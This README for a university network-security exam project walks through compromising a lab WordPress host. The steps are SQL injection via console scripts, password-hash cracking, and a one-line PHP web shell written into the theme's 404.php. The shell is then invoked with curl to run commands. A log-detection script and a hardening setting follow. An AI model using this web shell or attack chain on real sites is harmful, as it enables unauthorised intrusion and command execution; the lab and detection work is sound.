Project for the Network Security exam by Dotani, Ferrara, Forino, Galateo
- Connect to the Kali shell using the dsp.
- Enable VNC by running the script at `/home/vnc.sh`.
- Connect to the GUI using a VNC viewer.
- Use Kali's browser to browse to the target at IP address `193.20.1.4`.
- Use the unknown mode.
- Answer "Yes" to the poll.
- Open the script at `/home/sql_inj_script.js` with a text editor.
- Copy/paste the first part of the script into the browser's console.
- After the page reloads, you will see an error in the console.
- Copy/paste the second part of the script into the console, and you will get the users list in the console.
- Repeat with the 3rd and 4th parts of the script to get the hashes list in the browser's console.
- Copy the hash from the console and paste it into the `hash.txt` file in the `/home` directory.
- Open the terminal and run the following commands:

  ```sh
  cd /home
  ./discover_psw.sh
  ```

- You will find the matched `hash:pwd` in the `cracked.txt` file.
- Log in to the following URL: `http://193.20.1.4/wp-login.php`.
- Open the theme editor and edit the page `404.php` of the `twentytwenty` theme.
- Overwrite all the code with the following:

  ```php
  <?php system($_GET['cmd']);
  ```

- Call the following URL for remote code execution (you can run any shell command by passing it after the `cmd` parameter in the URL):

  ```sh
  curl -X GET "http://193.20.1.4/wp-content/themes/<themename>/404.php?cmd=cat%20flag.txt"
  ```

- Install Docker
- Clone the repository.
- Run the following:

  ```sh
  docker compose up
  ```

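The last two walkthrough steps (the edited `404.php` and the `cmd` request) leave a recognizable trace in the web server's access log: a theme template requested by its own path with a query string. The following check is an added example, not part of the project; it assumes combined-format access logs, and the function name and the sample lines (including the client address `192.0.2.10`) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined log format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A theme template fetched by its own path instead of through WordPress routing.
THEME_PHP_RE = re.compile(r'^/wp-content/themes/(?P<theme>[^/]+)/(?P<file>[^/]+\.php)$')

def flag_theme_template_requests(lines):
    """Return one finding per direct request to a theme .php file that carries query parameters."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line this parser understands
        url = urlsplit(m["target"])
        # Decode the path first so percent-encoded separators do not hide the match.
        t = THEME_PHP_RE.match(unquote(url.path))
        if not t:
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # values are percent-decoded
        if not params:
            continue
        findings.append({
            "host": m["host"],
            "time": m["time"],
            "theme": t["theme"],
            "file": t["file"],
            "status": int(m["status"]),
            "params": {k: v[0] for k, v in params.items()},
        })
    return findings

# Constructed sample lines (not captured from the lab environment).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:05:12 +0000] "GET /wp-content/themes/twentytwenty/404.php?cmd=cat%20flag.txt HTTP/1.1" 200 42 "-" "curl/8.0"',
    '192.0.2.10 - - [01/Jan/2024:10:06:00 +0000] "GET /wp-content/themes/twentytwenty/style.css?ver=1.0 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in flag_theme_template_requests(SAMPLE_LOG):
        print(finding)
```

Setting `define('DISALLOW_FILE_EDIT', true);` in `wp-config.php` removes the dashboard theme editor used in the walkthrough, so an administrator login alone no longer allows template edits from the browser.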
This project is licensed under the MIT License - see the LICENSE file for details.